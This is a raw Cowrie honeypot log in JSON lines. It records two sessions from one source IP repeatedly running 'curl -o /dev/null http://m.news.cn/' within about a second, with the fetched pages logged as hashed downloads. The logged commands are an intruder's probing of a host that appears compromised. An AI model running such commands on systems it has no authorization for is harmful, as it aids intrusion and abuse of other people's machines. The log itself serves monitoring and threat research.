{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.563805Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.571863Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.573770Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.593529Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.594844Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.599356Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.600894Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.615158Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.637247Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.638551Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.642239Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.643385Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.671932Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.678865Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.680334Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.683473Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.684747Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.711696Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.718792Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.721554Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.722688Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.724949Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.726884Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.729172Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.760686Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.762023Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.773149Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.774384Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.815139Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.816520Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.823673Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.825077Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.862944Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.864124Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.868136Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.869154Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.900781Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.902066Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.908444Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.909603Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.916783Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.940547Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.941909Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.949127Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.950447Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.953357Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.982196Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.983618Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.992956Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.994364Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.005030Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.026338Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.027781Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.038162Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.039239Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.050541Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.071238Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.072461Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.080311Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.081537Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.116135Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.117849Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.121302Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.125913Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.127097Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.155199Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.156386Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.172555Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.173813Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.175142Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.197554Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.198734Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.216907Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.218084Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.236722Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.237757Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.255566Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.256961Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.273944Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.275151Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.293753Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.294894Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.311634Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.312820Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.334192Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.335508Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.352656Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.353952Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.372673Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.374085Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.375208Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.388380Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.389438Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.396274Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.414366Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.415751Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.416929Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.430498Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.431691Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:21.459091Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.460458Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:21.466393Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
